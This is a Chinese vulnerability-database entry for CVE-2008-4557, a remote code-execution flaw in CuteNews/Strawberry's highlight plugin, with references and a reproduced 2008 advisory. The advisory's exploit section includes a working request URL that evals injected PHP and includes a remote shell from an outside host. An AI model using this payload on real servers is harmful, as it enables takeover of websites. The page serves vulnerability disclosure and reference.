cutephp cutenews代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114231 漏洞类型 代码注入
发布时间 2008-01-06 更新时间 2008-10-14
CVE编号 CVE-2008-4557 CNNVD-ID CNNVD-200810-241
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/4851
https://www.securityfocus.com/bid/84783
https://cxsecurity.com/issue/WLB-2008100157
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-241
|漏洞详情
CuteNews.ru(又称Strawberry)的Strawberry中的plugins/wacko/highlight/html.php存在代码注入漏洞,远程攻击者可以通过text参数插入一个可执行的正规表达式来执行任意PHP代码。
|漏洞EXP
----[ CuteNews Remote Code Execution ... ITDefence.ru Antichat.ru ]

							Strawberry (CuteNews) Remote Code Execution
							Eugene Minaev underwater@itdefence.ru
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
			
		Preg_replace with 'e' modifier allows code execution
		<?php

		$source = htmlspecialchars($text);

		$source = preg_replace(
		'/<!--(.*?)-->/es',
		'"<span style=\"color: ".$options["color"]["comment"].";\"><!--".
		str_replace("<","<<!-- -->",
		str_replace("=","=<!-- -->",
		"$1")).
		"--></span>"',
		$source);  

		?>
		
		strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell');
		

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-06]
|受影响的产品
CutePHP CuteNews 1.1.1
|参考资料

来源:XF
名称:cutenews-html-code-execution(39450)
链接:http://xforce.iss.net/xforce/xfdb/39450
来源:OSVDB
名称:40236
链接:http://www.osvdb.org/40236
来源:MILW0RM
名称:4851
链接:http://www.milw0rm.com/exploits/4851
来源:SREASON
名称:4403
链接:http://securityreason.com/securityalert/4403
来源:SECUNIA
名称:28330
链接:http://secunia.com/advisories/28330